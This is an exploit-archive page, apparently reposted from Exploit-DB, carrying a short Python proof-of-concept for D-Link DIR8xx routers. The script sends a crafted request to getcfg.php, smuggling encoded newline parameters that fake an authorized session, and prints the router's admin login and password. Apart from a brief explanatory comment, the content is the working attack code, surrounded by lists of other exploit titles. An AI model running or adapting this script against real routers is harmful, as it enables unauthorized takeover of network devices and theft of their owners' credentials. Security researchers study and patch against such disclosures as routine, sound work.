首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
D-Link DIR8xx Routers - Leak Credentials
来源:https://embedi.com 作者:embedi 发布时间:2017-09-18  
# phpcgi is responsible for processing requests to .php, .asp and .txt pages. Also, it checks whether a user is authorized or not. Nevertheless, if a request is crafted in a proper way, an attacker can easily bypass authorization and execute a script that returns a login and password to a router. # E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin # E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/phpcgi.py import requests as rq EQ = "%3d" IP = "192.168.0.1" PORT = "80" def pair(key, value): return "%0a_POST_" + key + EQ + value headers_multipart = { 'CONTENT-TYPE' : 'application/x-www-form-urlencoded' } url = 'http://{ip}:{port}/getcfg.php'.format(ip=IP, port=PORT) auth = "%0aAUTHORIZED_GROUP%3d1" data = "A=A" + pair("SERVICES", "DEVICE.ACCOUNT") + auth print(rq.get(url, data=data, headers=headers_multipart).text)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Astaro Security Gateway 7 - Re
·D-Link DIR8xx Routers - Root R
·Jungo DriverWizard WinDriver 1
·D-Link DIR8xx Routers - Local
·WebKit JSC BytecodeGenerator::
·Netdecision 5.8.2 - Local Priv
·tcprewrite 3.4.4 Buffer Overfl
·Digirez 3.4 - Cross-Site Reque
·MobaXtrem 10.4 Remote Code Exe
·Digileave 1.2 - Cross-Site Req
·Docker Daemon Unprotected TCP
·DigiAffiliate 1.4 - Cross-Site
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved